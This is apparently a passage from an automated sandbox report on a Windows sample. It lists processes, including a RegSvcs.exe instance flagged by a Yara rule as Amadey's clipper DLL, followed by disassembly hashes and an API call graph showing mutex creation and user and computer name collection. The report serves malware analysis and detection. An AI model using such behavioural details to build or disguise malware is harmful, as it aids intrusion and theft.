                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Windows\system32\ipconfig.exe" /flushdns
                                                    Imagebase:0x7ff607f10000
                                                    File size:35'840 bytes
                                                    MD5 hash:62F170FB07FDBB79CEB7147101406EB8
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    General

                                                    Target ID:3
                                                    Start time:02:41:58
                                                    Start date:08/01/2025
                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                    Imagebase:0x7ff7699e0000
                                                    File size:45'984 bytes
                                                    MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Amadey_3, Description: Yara detected Amadey\'s Clipper DLL, Source: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                    Reputation:high
                                                    Has exited:false

                                                    General

                                                    Target ID:4
                                                    Start time:02:41:58
                                                    Start date:08/01/2025
                                                    Path:C:\Windows\System32\wermgr.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Windows\system32\wermgr.exe" "-outproc" "0" "6544" "2596" "2480" "2600" "0" "0" "2604" "0" "0" "0" "0" "0"
                                                    Imagebase:0x7ff783f90000
                                                    File size:229'728 bytes
                                                    MD5 hash:74A0194782E039ACE1F7349544DC1CF4
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    Disassembly

                                                    Reset < >

                                                      Executed Functions

                                                      Function 00007FFD9BB713CC Relevance: 1.6, Strings: 1, Instructions: 328COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1879489636.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffd9bb70000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: H
                                                      • API String ID: 0-2852464175
                                                      • Opcode ID: a2ed96a1640fbbac2dbcb90549ac6651518add707067e8b5aa006c6f0cebb284
                                                      • Instruction ID: 3bc946cc3c99a1784bcf00a2f4bf2fb7708990eb0e098768a0b339a18c54d528
                                                      • Opcode Fuzzy Hash: a2ed96a1640fbbac2dbcb90549ac6651518add707067e8b5aa006c6f0cebb284
                                                      • Instruction Fuzzy Hash: 5BA10622B0EA8D0FE7AADB6848B45B47BE1EF56318B1901FBD08DC75E3DD18A905C351
                                                      Function 00007FFD9BAA8AAE Relevance: 1.3, Strings: 1, Instructions: 13COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1879052852.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffd9baa0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0
                                                      • API String ID: 0-1558408351
                                                      • Opcode ID: 34f819592b754329755a513f0172eab2dd6b9e8eb58747ef82e6f3568c6342f5
                                                      • Instruction ID: 2197b7d18d909bb86020ce3a82cff27a682aaf18c63a34c274caf448969b8512
                                                      • Opcode Fuzzy Hash: 34f819592b754329755a513f0172eab2dd6b9e8eb58747ef82e6f3568c6342f5
                                                      • Instruction Fuzzy Hash: 5AD02231A1E2409FDB2C36B849230363316EB1AA1472170BEC08783072DC7880838E80
                                                      Function 00007FFD9BAAE275 Relevance: .5, Instructions: 466COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1879052852.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffd9baa0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c3d2fa97acc252f316f3c397aa25230ba1a970780888abfe9d21145fc14fdab2
                                                      • Instruction ID: b959b75c91e37015023925bb0fdce6c6cfa9c53695980f338e58c9a091a6901e
                                                      • Opcode Fuzzy Hash: c3d2fa97acc252f316f3c397aa25230ba1a970780888abfe9d21145fc14fdab2
                                                      • Instruction Fuzzy Hash: C1819D31E0E28A4FD734DBA898651F97BE2EF54300F1501BFD489C72A3EE785A458791
                                                      Function 00007FFD9BAA584A Relevance: .1, Instructions: 62COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1879052852.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffd9baa0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 49456fd7cace28a2a66b11a29fe679dcbfcd9cf5de304d4884b4c81925748bab
                                                      • Instruction ID: ed3f0d88deb0fb6997edc2f2ad705cd55268c6ec707298ce25b7412fc3f407b2
                                                      • Opcode Fuzzy Hash: 49456fd7cace28a2a66b11a29fe679dcbfcd9cf5de304d4884b4c81925748bab
                                                      • Instruction Fuzzy Hash: 2E115C62A1EBC55FD32DD7BC486A47DBBD2EF45200B0504BEE0CA8B1F3DD64A5028756
                                                      Function 00007FFD9BAA58B9 Relevance: .1, Instructions: 60COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1879052852.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffd9baa0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fbb171113758a568c7c00e3c82cee4e7e8f9e16d5cd623da1ea80dc79b5d6b36
                                                      • Instruction ID: 2f0218d27a5a01cc1df3e41c3e3f6d6c9c053f9d5e5d7ded78ce0da1ea8d046d
                                                      • Opcode Fuzzy Hash: fbb171113758a568c7c00e3c82cee4e7e8f9e16d5cd623da1ea80dc79b5d6b36
                                                      • Instruction Fuzzy Hash: B5112C61B1EA851FD31DE77C48665BD77D2EF84100B0508BEE0CACB1F3DD64A5028751
                                                      Function 00007FFD9BAA37B5 Relevance: .0, Instructions: 49COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1879052852.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffd9baa0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                      • Instruction ID: e02c57d93778fbc6a584bb8048c67e799a1b42380c49818b8706c6f29e2a7d3a
                                                      • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                      • Instruction Fuzzy Hash: 8F01A77020CB0C4FD748EF0CE051AA6B3E0FF85320F10056DE58AC36A1D632E882CB45
                                                      Function 00007FFD9BAA4CE7 Relevance: .0, Instructions: 25COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1879052852.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffd9baa0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bb8b6bd48359692fa01c415565ea2583b41d4d6d37bf18ac4688cc88a90fc6ed
                                                      • Instruction ID: 04ce52abb1ffe6ad4324462e338a18db494bde0e72ecafe841d7c0ead3b91585
                                                      • Opcode Fuzzy Hash: bb8b6bd48359692fa01c415565ea2583b41d4d6d37bf18ac4688cc88a90fc6ed
                                                      • Instruction Fuzzy Hash: AAF0DA74E0920B8FDB50DFA4C5815AEB7F1EF04310F204929D115EB265DB79A7408B94
                                                      Function 00007FFD9BAA4CD1 Relevance: .0, Instructions: 25COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1879052852.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffd9baa0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3c2665f9dc6837db9ccf4dddd278245b0af311693f6dd907fbbb64c8da830607
                                                      • Instruction ID: 11c261f94a438a7cbfb1773509b98890acd8ddb0f2dc86d3d6e6d21199613e4c
                                                      • Opcode Fuzzy Hash: 3c2665f9dc6837db9ccf4dddd278245b0af311693f6dd907fbbb64c8da830607
                                                      • Instruction Fuzzy Hash: 94F01775E1920F8BDB10DFA4C4915AEB7F1EF04310F208929D015EB264DA78A6408B90

                                                      Non-executed Functions

                                                      Function 00007FFD9BAACF3C Relevance: .1, Instructions: 86COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1879052852.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffd9baa0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 27ead1c676cf8d7b243a3c3f72aadd30adbb71dfa29f04a07a1866cc8afbaeb9
                                                      • Instruction ID: 205085948d7ac82e31594b76574a25a166dc8053e89d4959c50e3fabddcabba1
                                                      • Opcode Fuzzy Hash: 27ead1c676cf8d7b243a3c3f72aadd30adbb71dfa29f04a07a1866cc8afbaeb9
                                                      • Instruction Fuzzy Hash: A6115BB2B0D6080FA31C9D6C6C56436B79AD3C6220711933FE5CBC23A3E960AC0386C5

                                                      Execution Graph

                                                      Execution Coverage:4.2%
                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:27.1%
                                                      Total number of Nodes:1294
                                                      Total number of Limit Nodes:13
                                                      execution_graph 33373 43a573 33374 43a716 33373->33374 33376 43a59d 33373->33376 33424 431262 14 API calls __dosmaperr 33374->33424 33376->33374 33379 43a5e8 33376->33379 33378 43a733 33394 43eeb0 33379->33394 33383 43a61c 33384 43a735 33383->33384 33409 43e595 33383->33409 33432 42f049 IsProcessorFeaturePresent 33384->33432 33387 43a62e 33387->33384 33416 43e5c1 33387->33416 33388 43a741 33390 43a640 33390->33384 33391 43a649 33390->33391 33392 43a701 33391->33392 33423 43ef0d 25 API calls 2 library calls 33391->33423 33425 4299c0 33392->33425 33395 43eebc ___scrt_is_nonwritable_in_current_image 33394->33395 33396 43a608 33395->33396 33436 4326f0 EnterCriticalSection 33395->33436 33402 43e569 33396->33402 33398 43eecd 33401 43eee1 33398->33401 33437 43ed89 33398->33437 33457 43ef04 LeaveCriticalSection std::_Lockit::~_Lockit 33401->33457 33403 43e575 33402->33403 33404 43e58a 33402->33404 33579 431262 14 API calls __dosmaperr 33403->33579 33404->33383 33406 43e57a 33580 42f01c 25 API calls ___std_exception_copy 33406->33580 33408 43e585 33408->33383 33410 43e5a1 33409->33410 33411 43e5b6 33409->33411 33581 431262 14 API calls __dosmaperr 33410->33581 33411->33387 33413 43e5a6 33582 42f01c 25 API calls ___std_exception_copy 33413->33582 33415 43e5b1 33415->33387 33417 43e5e2 33416->33417 33418 43e5cd 33416->33418 33417->33390 33583 431262 14 API calls __dosmaperr 33418->33583 33420 43e5d2 33584 42f01c 25 API calls ___std_exception_copy 33420->33584 33422 43e5dd 33422->33390 33423->33392 33424->33392 33426 4299c8 33425->33426 33427 4299c9 IsProcessorFeaturePresent 33425->33427 33426->33378 33429 429bf5 33427->33429 33585 429bb8 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 33429->33585 33431 429cd8 33431->33378 33433 42f055 33432->33433 33586 42ee6d 33433->33586 33436->33398 33438 43edd5 33437->33438 33439 43eddc 33438->33439 33440 43eded 33438->33440 33441 43ee53 33439->33441 33445 43ee4a 33439->33445 33559 4383e5 15 API calls 2 library calls 33440->33559 33449 43ee50 33441->33449 33520 43ec2f 33441->33520 33443 43edfb 33454 43ee02 33443->33454 33455 43ee2a 33443->33455 33458 43e98e 33445->33458 33446 4381b6 _free 14 API calls 33448 43ee5e 33446->33448 33450 4299c0 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 33448->33450 33449->33446 33452 43ee6c 33450->33452 33452->33401 33453 43ee08 33453->33439 33560 4381b6 33454->33560 33456 4381b6 _free 14 API calls 33455->33456 33456->33453 33457->33396 33459 43e99e 33458->33459 33460 43e5c1 25 API calls 33459->33460 33461 43e9bd 33460->33461 33462 43ec24 33461->33462 33463 43e569 25 API calls 33461->33463 33464 42f049 __Getctype 11 API calls 33462->33464 33465 43e9cf 33463->33465 33466 43ec2e 33464->33466 33465->33462 33467 43ea29 33465->33467 33469 43ec1d 33465->33469 33470 43e5c1 25 API calls 33466->33470 33566 4383e5 15 API calls 2 library calls 33467->33566 33469->33449 33472 43ec5c 33470->33472 33471 43ea3a 33473 4381b6 _free 14 API calls 33471->33473 33517 43ebff 33471->33517 33475 43ed7e 33472->33475 33479 43e569 25 API calls 33472->33479 33476 43ea50 33473->33476 33474 4381b6 _free 14 API calls 33478 43ec1c 33474->33478 33477 42f049 __Getctype 11 API calls 33475->33477 33567 43c669 25 API calls 2 library calls 33476->33567 33485 43ed88 33477->33485 33478->33469 33480 43ec6e 33479->33480 33480->33475 33481 43e595 25 API calls 33480->33481 33483 43ec80 33481->33483 33483->33475 33486 43ec89 33483->33486 33484 43ea7e 33487 43ec22 33484->33487 33504 43ea89 __fread_nolock 33484->33504 33488 43eddc 33485->33488 33490 43eded 33485->33490 33489 4381b6 _free 14 API calls 33486->33489 33487->33462 33492 43ee53 33488->33492 33496 43ee4a 33488->33496 33491 43ec94 GetTimeZoneInformation 33489->33491 33573 4383e5 15 API calls 2 library calls 33490->33573 33510 43ed58 33491->33510 33511 43ecb0 __fread_nolock 33491->33511 33494 43ee50 33492->33494 33495 43ec2f 41 API calls 33492->33495 33497 4381b6 _free 14 API calls 33494->33497 33495->33494 33499 43e98e 41 API calls 33496->33499 33500 43ee5e 33497->33500 33498 43ee02 33502 4381b6 _free 14 API calls 33498->33502 33499->33494 33501 4299c0 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 33500->33501 33505 43ee6c 33501->33505 33506 43ee08 33502->33506 33503 43edfb 33503->33498 33507 43ee2a 33503->33507 33568 43e947 42 API calls 6 library calls 33504->33568 33505->33449 33506->33488 33508 4381b6 _free 14 API calls 33507->33508 33508->33506 33510->33449 33570 432a17 37 API calls __Getctype 33511->33570 33513 43ed33 33571 43ee6e 42 API calls 4 library calls 33513->33571 33515 43ed44 33572 43ee6e 42 API calls 4 library calls 33515->33572 33517->33474 33519 43ead4 33519->33517 33569 43e947 42 API calls 6 library calls 33519->33569 33521 43ec3f 33520->33521 33522 43e5c1 25 API calls 33521->33522 33523 43ec5c 33522->33523 33524 43ed7e 33523->33524 33526 43e569 25 API calls 33523->33526 33525 42f049 __Getctype 11 API calls 33524->33525 33530 43ed88 33525->33530 33527 43ec6e 33526->33527 33527->33524 33528 43e595 25 API calls 33527->33528 33529 43ec80 33528->33529 33529->33524 33531 43ec89 33529->33531 33532 43eddc 33530->33532 33534 43eded 33530->33534 33533 4381b6 _free 14 API calls 33531->33533 33536 43ee53 33532->33536 33540 43ee4a 33532->33540 33535 43ec94 GetTimeZoneInformation 33533->33535 33577 4383e5 15 API calls 2 library calls 33534->33577 33552 43ed58 33535->33552 33553 43ecb0 __fread_nolock 33535->33553 33538 43ee50 33536->33538 33539 43ec2f 41 API calls 33536->33539 33541 4381b6 _free 14 API calls 33538->33541 33539->33538 33543 43e98e 41 API calls 33540->33543 33544 43ee5e 33541->33544 33542 43ee02 33546 4381b6 _free 14 API calls 33542->33546 33543->33538 33545 4299c0 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 33544->33545 33548 43ee6c 33545->33548 33549 43ee08 33546->33549 33547 43edfb 33547->33542 33550 43ee2a 33547->33550 33548->33449 33549->33532 33551 4381b6 _free 14 API calls 33550->33551 33551->33549 33552->33449 33574 432a17 37 API calls __Getctype 33553->33574 33555 43ed33 33575 43ee6e 42 API calls 4 library calls 33555->33575 33557 43ed44 33576 43ee6e 42 API calls 4 library calls 33557->33576 33559->33443 33561 4381c1 HeapFree 33560->33561 33562 4381ea __dosmaperr 33560->33562 33561->33562 33563 4381d6 33561->33563 33562->33453 33578 431262 14 API calls __dosmaperr 33563->33578 33565 4381dc GetLastError 33565->33562 33566->33471 33567->33484 33568->33519 33569->33517 33570->33513 33571->33515 33572->33510 33573->33503 33574->33555 33575->33557 33576->33552 33577->33547 33578->33565 33579->33406 33580->33408 33581->33413 33582->33415 33583->33420 33584->33422 33585->33431 33587 42ee89 __fread_nolock std::locale::_Setgloballocale 33586->33587 33588 42eeb5 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 33587->33588 33591 42ef86 std::locale::_Setgloballocale 33588->33591 33589 4299c0 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 33590 42efa4 GetCurrentProcess TerminateProcess 33589->33590 33590->33388 33591->33589 33592 430632 33593 430640 33592->33593 33594 43064e 33592->33594 33595 4306a4 57 API calls 33593->33595 33605 42e919 33594->33605 33597 43064a 33595->33597 33602 43067c 33603 43069e 33602->33603 33604 4381b6 _free 14 API calls 33602->33604 33604->33603 33636 42e1f7 33605->33636 33608 42e93d 33610 42e8fc 33608->33610 33648 42e84a 33610->33648 33613 4306a4 33614 4306b2 33613->33614 33615 4306cf __fread_nolock 33613->33615 33699 43124f 14 API calls __dosmaperr 33614->33699 33618 430711 CreateFileW 33615->33618 33619 4306f5 33615->33619 33617 4306b7 33700 431262 14 API calls __dosmaperr 33617->33700 33622 430743 33618->33622 33623 430735 33618->33623 33702 43124f 14 API calls __dosmaperr 33619->33702 33705 430782 49 API calls __dosmaperr 33622->33705 33673 43080c GetFileType 33623->33673 33624 4306bf 33701 42f01c 25 API calls ___std_exception_copy 33624->33701 33626 4306fa 33703 431262 14 API calls __dosmaperr 33626->33703 33629 4306ca 33629->33602 33631 430701 33704 42f01c 25 API calls ___std_exception_copy 33631->33704 33633 43073e __fread_nolock 33634 430774 CloseHandle 33633->33634 33635 43070c 33633->33635 33634->33635 33635->33602 33637 42e217 33636->33637 33638 42e20e 33636->33638 33637->33638 33645 436dd0 37 API calls 3 library calls 33637->33645 33638->33608 33644 43880f 5 API calls std::_Lockit::_Lockit 33638->33644 33640 42e237 33646 4375f6 37 API calls __Getctype 33640->33646 33642 42e24d 33647 437623 37 API calls __fassign 33642->33647 33644->33608 33645->33640 33646->33642 33647->33638 33649 42e872 33648->33649 33650 42e858 33648->33650 33652 42e898 33649->33652 33653 42e879 33649->33653 33666 42e958 14 API calls _free 33650->33666 33668 438433 MultiByteToWideChar 33652->33668 33654 42e862 33653->33654 33667 42e972 15 API calls __wsopen_s 33653->33667 33654->33602 33654->33613 33657 42e8a7 33658 42e8ae GetLastError 33657->33658 33659 42e8d4 33657->33659 33671 42e972 15 API calls __wsopen_s 33657->33671 33669 43122c 14 API calls __dosmaperr 33658->33669 33659->33654 33672 438433 MultiByteToWideChar 33659->33672 33661 42e8ba 33670 431262 14 API calls __dosmaperr 33661->33670 33665 42e8eb 33665->33654 33665->33658 33666->33654 33667->33654 33668->33657 33669->33661 33670->33654 33671->33659 33672->33665 33674 4308f9 33673->33674 33677 430847 33673->33677 33675 430925 33674->33675 33678 430903 33674->33678 33679 43094f PeekNamedPipe 33675->33679 33689 4308f0 33675->33689 33676 430861 __fread_nolock 33683 430880 GetFileInformationByHandle 33676->33683 33676->33689 33677->33676 33723 430b82 21 API calls __dosmaperr 33677->33723 33681 430907 33678->33681 33682 430916 GetLastError 33678->33682 33679->33689 33725 431262 14 API calls __dosmaperr 33681->33725 33726 43122c 14 API calls __dosmaperr 33682->33726 33683->33682 33685 430896 33683->33685 33706 430ad4 33685->33706 33687 4299c0 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 33688 43097a 33687->33688 33688->33633 33689->33687 33694 43097c 7 API calls 33695 4308c6 33694->33695 33696 43097c 7 API calls 33695->33696 33697 4308dd 33696->33697 33724 430aa1 14 API calls __dosmaperr 33697->33724 33699->33617 33700->33624 33701->33629 33702->33626 33703->33631 33704->33635 33705->33633 33708 430aea 33706->33708 33707 4308a2 33716 43097c 33707->33716 33708->33707 33727 42e306 38 API calls 3 library calls 33708->33727 33710 430b2e 33710->33707 33728 42e306 38 API calls 3 library calls 33710->33728 33712 430b3f 33712->33707 33729 42e306 38 API calls 3 library calls 33712->33729 33714 430b50 33714->33707 33730 42e306 38 API calls 3 library calls 33714->33730 33717 4309a2 FileTimeToSystemTime 33716->33717 33718 430994 33716->33718 33719 4309b4 SystemTimeToTzSpecificLocalTime 33717->33719 33720 43099a 33717->33720 33718->33717 33718->33720 33719->33720 33721 4299c0 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 33720->33721 33722 4308b3 33721->33722 33722->33694 33723->33676 33724->33689 33725->33689 33726->33689 33727->33710 33728->33712 33729->33714 33730->33707 33731 446581 33732 44658d ___scrt_is_nonwritable_in_current_image 33731->33732 33739 4326f0 EnterCriticalSection 33732->33739 33734 446598 33740 4465e0 33734->33740 33738 4465c2 33739->33734 33741 446606 33740->33741 33742 4465f0 33740->33742 33744 446661 33741->33744 33745 44661c 33741->33745 33763 431262 14 API calls __dosmaperr 33742->33763 33765 431262 14 API calls __dosmaperr 33744->33765 33759 4464fd 33745->33759 33746 4465f5 33764 42f01c 25 API calls ___std_exception_copy 33746->33764 33749 446666 33766 42f01c 25 API calls ___std_exception_copy 33749->33766 33752 4465ae 33758 4465d7 LeaveCriticalSection std::_Lockit::~_Lockit 33752->33758 33755 44667c 33755->33752 33756 42f049 __Getctype 11 API calls 33755->33756 33757 446696 33756->33757 33758->33738 33761 44650b 33759->33761 33760 446571 33760->33752 33767 43c669 25 API calls 2 library calls 33760->33767 33761->33760 33768 446c93 38 API calls 2 library calls 33761->33768 33763->33746 33764->33752 33765->33749 33766->33752 33767->33755 33768->33761 33769 42a135 33770 42a141 ___scrt_is_nonwritable_in_current_image 33769->33770 33795 429e5b 33770->33795 33772 42a148 33773 42a2a1 33772->33773 33783 42a172 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock std::locale::_Setgloballocale 33772->33783 33819 42a4a5 4 API calls 2 library calls 33773->33819 33775 42a2a8 33820 42df5e 23 API calls std::locale::_Setgloballocale 33775->33820 33777 42a2ae 33821 42df22 23 API calls std::locale::_Setgloballocale 33777->33821 33779 42a2b6 33780 42a191 33781 42a212 33803 43431b 33781->33803 33783->33780 33783->33781 33818 42df38 37 API calls 4 library calls 33783->33818 33785 42a218 33807 420db0 33785->33807 33796 429e64 33795->33796 33822 42a68f IsProcessorFeaturePresent 33796->33822 33798 429e70 33823 42c779 10 API calls 2 library calls 33798->33823 33800 429e75 33801 429e79 33800->33801 33824 42c798 7 API calls 2 library calls 33800->33824 33801->33772 33804 434324 33803->33804 33805 434329 33803->33805 33825 433e76 49 API calls 33804->33825 33805->33785 33826 40c6d0 Sleep CreateMutexA GetLastError 33807->33826 33815 420dcf 33816 420d80 CreateThread 33815->33816 33817 420da0 Sleep 33816->33817 34727 420cf0 33816->34727 33817->33817 33818->33781 33819->33775 33820->33777 33821->33779 33822->33798 33823->33800 33824->33801 33825->33805 33827 40c709 33826->33827 33828 40c71a 33826->33828 33827->33828 33829 40c70d GetLastError 33827->33829 33833 411600 33828->33833 33829->33828 33830 40c71c 33829->33830 34073 42df5e 23 API calls std::locale::_Setgloballocale 33830->34073 33832 40c723 33834 411650 33833->33834 33835 41166a 33833->33835 34074 423340 33834->34074 33836 4299c0 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 33835->33836 33838 411d25 33836->33838 33841 411e90 33838->33841 33839 41165f 34090 4061f0 33839->34090 33842 411ecb 33841->33842 33843 41229a 33841->33843 33846 423340 70 API calls 33842->33846 33844 4299c0 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 33843->33844 33845 4122b2 33844->33845 33903 41f4b0 33845->33903 33847 411f15 33846->33847 33848 4061f0 114 API calls 33847->33848 33849 411f20 33848->33849 33850 4122b6 33849->33850 33851 411f3f 33849->33851 34381 4026a0 27 API calls 33850->34381 34368 425920 27 API calls 3 library calls 33851->34368 33854 4122bb 33856 42f02c 25 API calls 33854->33856 33855 411f6e 33857 425740 27 API calls 33855->33857 33859 4122c0 33856->33859 33858 411f8b 33857->33858 34369 423280 33858->34369 34382 42e7c6 67 API calls 4 library calls 33859->34382 33862 4122c6 34383 423300 27 API calls 33862->34383 33864 4122db 33865 423340 70 API calls 33864->33865 33869 4122f6 33865->33869 33866 412053 GetModuleFileNameA 33870 412090 33866->33870 33867 411f9d _Ref_count_obj 33867->33854 33867->33866 33868 412049 _Ref_count_obj 33867->33868 33868->33866 34384 423300 27 API calls 33869->34384 33870->33870 33872 424250 27 API calls 33870->33872 33880 4120ac _Ref_count_obj 33872->33880 33873 412309 34385 42df5e 23 API calls std::locale::_Setgloballocale 33873->34385 33874 412144 34374 42e1e0 28 API calls 33874->34374 33877 41231c 33879 42f02c 25 API calls 33877->33879 33878 41215b 33878->33859 33882 412166 33878->33882 33884 412321 33879->33884 33880->33874 33880->33877 33881 412215 _Ref_count_obj 33880->33881 33881->33843 33881->33877 33883 412290 _Ref_count_obj 33881->33883 34375 409ed0 GetFileAttributesA 33882->34375 33883->33843 33886 412171 33887 412189 33886->33887 33889 412182 CreateDirectoryA 33886->33889 34376 409ed0 GetFileAttributesA 33887->34376 33889->33887 33890 412194 33891 4121c6 33890->33891 33893 423340 70 API calls 33890->33893 34379 409ea0 68 API calls 33891->34379 33895 4121af 33893->33895 33894 4121d4 33894->33873 34380 423300 27 API calls 33894->34380 34377 40a8c0 28 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 33895->34377 33897 4121bd 34378 411080 28 API calls 2 library calls 33897->34378 33900 4121f1 33901 423340 70 API calls 33900->33901 33902 41220c 33901->33902 33902->33869 33904 41f4e8 33903->33904 34386 4078e0 33904->34386 33907 423280 25 API calls 33908 41f506 33907->33908 33909 41f536 _Ref_count_obj 33908->33909 33912 420cca 33908->33912 34402 4093d0 33909->34402 33914 42f02c 25 API calls 33912->33914 33916 420ce3 33914->33916 33919 4043e0 27 API calls 33920 41f56b RegOpenKeyExA RegCloseKey 33919->33920 33921 4043e0 27 API calls 33920->33921 33922 41f5bb 33921->33922 33923 423340 70 API calls 33922->33923 33924 41f5d9 33923->33924 33925 4061f0 114 API calls 33924->33925 33926 41f5e0 33925->33926 33927 423340 70 API calls 33926->33927 33928 41f5f5 33927->33928 33929 4061f0 114 API calls 33928->33929 33930 41f5fc 33929->33930 33931 41f613 GetUserNameA 33930->33931 33932 41f666 33931->33932 33932->33932 33933 424250 27 API calls 33932->33933 33934 41f682 33933->33934 34526 40b250 GetComputerNameExW 33934->34526 33939 41f6e3 33939->33939 33940 424250 27 API calls 33939->33940 33941 41f6fb 33940->33941 34666 409e20 33941->34666 33944 4043e0 27 API calls 33945 41f71d 33944->33945 33946 423340 70 API calls 33945->33946 33947 41f737 33946->33947 33948 4061f0 114 API calls 33947->33948 33949 41f742 33948->33949 33950 4043e0 27 API calls 33949->33950 33951 41f759 33950->33951 33952 423340 70 API calls 33951->33952 33953 41f76f 33952->33953 33954 4061f0 114 API calls 33953->33954 33955 41f77a 33954->33955 33956 423340 70 API calls 33955->33956 33957 41f79d 33956->33957 33958 4061f0 114 API calls 33957->33958 33959 41f7a8 33958->33959 33960 423340 70 API calls 33959->33960 33961 41f7cb 33960->33961 33962 4061f0 114 API calls 33961->33962 33963 41f7d6 33962->33963 33964 423340 70 API calls 33963->33964 33965 41f7f9 33964->33965 33966 4061f0 114 API calls 33965->33966 33967 41f804 33966->33967 33968 423340 70 API calls 33967->33968 33969 41f827 33968->33969 33970 4061f0 114 API calls 33969->33970 33971 41f832 33970->33971 33972 423340 70 API calls 33971->33972 33973 41f855 33972->33973 33974 4061f0 114 API calls 33973->33974 33975 41f860 33974->33975 33976 423340 70 API calls 33975->33976 33977 41f883 33976->33977 33978 4061f0 114 API calls 33977->33978 33979 41f88e 33978->33979 33980 423340 70 API calls 33979->33980 33981 41f8b1 33980->33981 33982 4061f0 114 API calls 33981->33982 33983 41f8bc 33982->33983 33984 423340 70 API calls 33983->33984 33985 41f8dd 33984->33985 33986 4061f0 114 API calls 33985->33986 33987 41f8e8 